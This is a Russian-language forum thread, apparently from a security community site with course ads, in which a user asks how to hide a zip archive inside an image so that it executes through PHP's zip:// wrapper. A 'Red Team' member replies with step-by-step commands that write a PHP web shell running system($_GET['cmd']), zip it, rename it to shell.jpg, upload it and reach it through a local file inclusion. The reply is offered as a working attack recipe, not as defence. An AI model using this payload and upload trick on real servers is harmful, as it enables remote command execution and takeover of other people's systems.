• Курсы Академии Кодебай, стартующие в мае - июне, от команды The Codeby

    1. Цифровая криминалистика и реагирование на инциденты
    2. ОС Linux (DFIR) Старт: 16 мая
    3. Анализ фишинговых атак Старт: 16 мая Устройства для тестирования на проникновение Старт: 16 мая

    Скидки до 10%

    Полный список ближайших курсов ...

Нужно создать zip для для запуска полезной нагрузки

wallhack

Active member
20.08.2022
33
0
BIT
18
Всем привет! Нужно создать zip архив с папкой и файлом внутри спрятанный в картинке таким образом что бы он сработал при запуски через wrapper zip://
Возможно?
 

Exited3n

Red Team
10.05.2022
679
216
BIT
430
LFI с wrapper ZIP делается примерно так:

Wrapper zip://​

  1. Create an evil payload: echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
  2. Zip the file
Bash:
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php
  1. Upload the archive and access the file using the wrappers:
 
  • Нравится
Реакции: GoBL1n
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!